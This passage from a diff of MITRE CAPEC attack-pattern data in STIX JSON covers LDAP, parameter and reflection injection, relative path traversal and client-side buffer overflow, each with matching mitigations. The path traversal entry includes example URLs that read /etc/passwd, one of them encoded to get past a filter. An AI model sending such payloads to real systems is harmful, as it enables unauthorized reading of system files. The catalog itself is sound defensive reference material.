"relationship--dcb94cfe-e24f-4a9f-90fe-c4f2388067b2", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1", + "target_ref": "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value.", + "external_references": [ + { + "external_id": "CAPEC-136", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/136.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-90", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/90.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "LDAP Injection", + "external_id": "29", + "source_name": "WASC", + "url": "http://projects.webappsec.org/LDAP-Injection" + }, + { + "description": "LDAP Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/LDAP_Injection" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-17", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/LDAP-Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-608", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.html" + } + ], + "id": "attack-pattern--4b435e98-08cb-4464-bf08-32f95e011d05", + "modified": "2020-12-17T00:00:00.000Z", + "name": "LDAP Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "PowerDNS before 2.9.18, when running with an LDAP backend, does not properly escape LDAP queries, which allows remote attackers to cause a denial of service (failure to answer ldap questions) and possibly conduct an LDAP injection attack. See also: CVE-2005-2301" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey application: The attacker takes an inventory of the entry points of the application.

    2. Techniques
    Spider web sites for all available links
    Sniff network communications with application using a utility such as WireShark.

Experiment

  1. Determine user-controllable input susceptible to LDAP injection: For each user-controllable input that the attacker suspects is vulnerable to LDAP injection, attempt to inject characters that have special meaning in LDAP (such as a single quote character, etc.). The goal is to create a LDAP query with an invalid syntax

    2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header.
    Use modified client (modified by reverse engineering) to inject input.

  2. Try to exploit the LDAP injection vulnerability: After determining that a given input is vulnerable to LDAP Injection, hypothesize what the underlying query looks like. Possibly using a tool, iteratively try to add logic to the query to extract information from the LDAP, or to modify or delete information in the LDAP.

    3. Techniques
    Add logic to the LDAP query to change the meaning of that command. Automated tools could be used to generate the LDAP injection strings.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in LDAP queries in the user input, and insert the user-supplied string in an LDAP query which is then processed." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of LDAP, especially its query syntax." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as LDAP content.", + "id": "course-of-action--e5e6818b-d525-4ade-8d2e-11e4664731e6", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-136-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9f1eb213-9854-4530-b7ae-cb3659bd69ac", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5e6818b-d525-4ade-8d2e-11e4664731e6", + "target_ref": "attack-pattern--4b435e98-08cb-4464-bf08-32f95e011d05", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the LDAP or application.", + "id": "course-of-action--b1261793-b0f9-4ad7-90fb-d3f6a464ccfe", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-136-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--674db528-648e-458e-81fc-e9ef0a61222e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b1261793-b0f9-4ad7-90fb-d3f6a464ccfe", + "target_ref": "attack-pattern--4b435e98-08cb-4464-bf08-32f95e011d05", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value \"myInput&new_param=myValue\", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example.", + "external_references": [ + { + "external_id": "CAPEC-137", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/137.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + } + ], + "id": "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Parameter Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Integrity": [ + "Modify Data (Successful parameter injection attacks mean a compromise to integrity of the application.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--3e3f4570-827b-4e0e-859b-00a4b13a1a65", + "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "attack-pattern--e3a32913-a4a6-4a3c-8f3b-a8a6dc16df53", + "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "attack-pattern--2a8824eb-4fd0-45a4-9c3c-af3fd7c5e0ca", + "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7" + ], + "x_capec_prerequisites": [ + "The target application must use a parameter encoding where separators and parameter identifiers are expressed in regular text.", + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The only requirement is the ability to provide string input to the target." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement an audit log written to a separate host. In the event of a compromise, the audit log may be able to provide evidence and details of the compromise.", + "id": "course-of-action--1b38336c-de87-49c0-9183-cdb80f9fb73b", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-137-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--87d764be-a2f1-4a91-b9fb-61093b531c50", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b38336c-de87-49c0-9183-cdb80f9fb73b", + "target_ref": "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Treat all user input as untrusted data that must be validated before use.", + "id": "course-of-action--96f190f9-bfce-4fbd-b4fd-9d07e68f3681", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-137-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f667d453-e763-41ac-ad05-bcda477818fd", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--96f190f9-bfce-4fbd-b4fd-9d07e68f3681", + "target_ref": "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.", + "external_references": [ + { + "external_id": "CAPEC-138", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/138.html" + }, + { + "external_id": "CWE-470", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/470.html" + } + ], + "id": "attack-pattern--e3a32913-a4a6-4a3c-8f3b-a8a6dc16df53", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Reflection Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target application must utilize reflection libraries and allow users to directly control the parameters to these methods. If the adversary can host classes where the target can invoke them, more powerful variants of this attack are possible.", + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \\) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.", + "external_references": [ + { + "external_id": "CAPEC-139", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/139.html" + }, + { + "external_id": "CWE-23", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/23.html" + }, + { + "description": "OWASP Testing Guide (v4), 2010, The Open Web Application Security Project (OWASP)", + "external_id": "REF-9", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-10", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal" + } + ], + "id": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Relative Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.\n http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd\n However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.\n Then an attacker creates special payloads to bypass this filter:\n http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd\n When the application gets this input string, it will be the desired vector by the attacker.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.

    2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages

  2. Survey application: Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.

    3. Techniques
    Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore a website and analyze how it is constructed. Many browser plug-ins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Attempt variations on input parameters: Using manual or automated means, an adversary attempts varying relative file path combinations on all found user input locations and observes the responses.

    2. Techniques
    Provide \"../\" or \"..\\\" at the beginning of any filename to traverse to the parent directory
    Use a list of probe strings as path traversal payload. Different strings may be used for different platforms. Strings contain relative path sequences such as \"../\".
    Use a proxy tool to record results of manual input of relative path traversal probes in known URLs.

Exploit

  1. Access, modify, or execute arbitrary files.: An adversary injects path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.

    2. Techniques
    Manipulate file and its path by injecting relative path sequences (e.g. \"../\").
    Download files, modify files, or try to execute shell commands (with binary files).
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must accept a string as user input, fail to sanitize combinations of characters in the input that have a special meaning in the context of path navigation, and insert the user-supplied string into path navigation commands." + ], + "x_capec_skills_required": { + "High": "To bypass non trivial filters in the application", + "Low": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-139-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbcc574c-56af-4a8a-b9c0-d5b4d59b58ed", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6783fbbe-cb1a-4317-b126-e62c3d58ea7a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Prefer working without user input when using file system calls", + "id": "course-of-action--58beef38-a794-42dd-9869-09e4f46ad695", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-139-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa273050-3e5a-48ed-99c7-1995e7e3dddf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58beef38-a794-42dd-9869-09e4f46ad695", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7fa50c0f-70d2-46b9-9b96-8a6d35003ae2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42bb8848-1460-40e7-8946-994f5692eb0b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service. This hostile service is created to deliver the correct content to the client software. For example, if the client-side application is a browser, the service will host a webpage that the browser loads.", + "external_references": [ + { + "external_id": "CAPEC-14", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/14.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Client-side Injection-induced Buffer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Authors often use tags in HTML documents. For example\n \n In Internet Explorer 4.0 an adversary attacker supplies an overly long path in the SRC= directive, the mshtml.dll component will suffer a buffer overflow. This is a standard example of content in a Web page being directed to exploit a faulty module in the system. There are potentially thousands of different ways data can propagate into a given system, thus these kinds of attacks will continue to be found in the wild.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target client-side application: The adversary identifies a target client-side application to perform the buffer overflow on. The most common are browsers. If there is a known browser vulnerability an adversary could target that.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

    2. Techniques
    Many times client side applications will be open source, so an adversary can examine the source code to identify possible injection vectors.
    Examine APIs of the client-side application and look for areas where a buffer overflow might be possible.

  2. Create hostile service: The adversary creates a hostile service that will deliver content to the client-side application. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

    3. Techniques
    If the client-side application is a browser, the adversary will create a service that delivers a malicious webpage to the browser.
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary delivers the content to the client-side application using the hostile service and overflows the buffer.

    2. Techniques
    If the adversary is targeting a local client-side application, they just need to use the service themselves.
    If the adversary is attempting to cause an overflow on an external user's client-side application, they must get the user to attach to their service by some other means. This could be getting a user to visit their hostile webpage to target a user's browser.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The targeted client software communicates with an external server.", + "The targeted client software has a buffer overflow vulnerability." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap requires a more in-depth knowledge and higher skill level.", + "Low": "To achieve a denial of service, an attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The client software should not install untrusted code from a non-authenticated server.", + "id": "course-of-action--2761b390-a1a6-4680-a497-a6a2c25e93c9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a74ceb6-2d35-4bcc-9ead-f651fb717fec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2761b390-a1a6-4680-a497-a6a2c25e93c9", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The client software should have the latest patches and should be audited for vulnerabilities before being used to communicate with potentially hostile servers.", + "id": "course-of-action--ce9d6c88-9b3a-4753-8f7e-6bdc4ae98b79", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ffe9eb1-760d-4e9e-9075-29f67befc8f5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ce9d6c88-9b3a-4753-8f7e-6bdc4ae98b79", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform input validation for length of buffer inputs.", + "id": 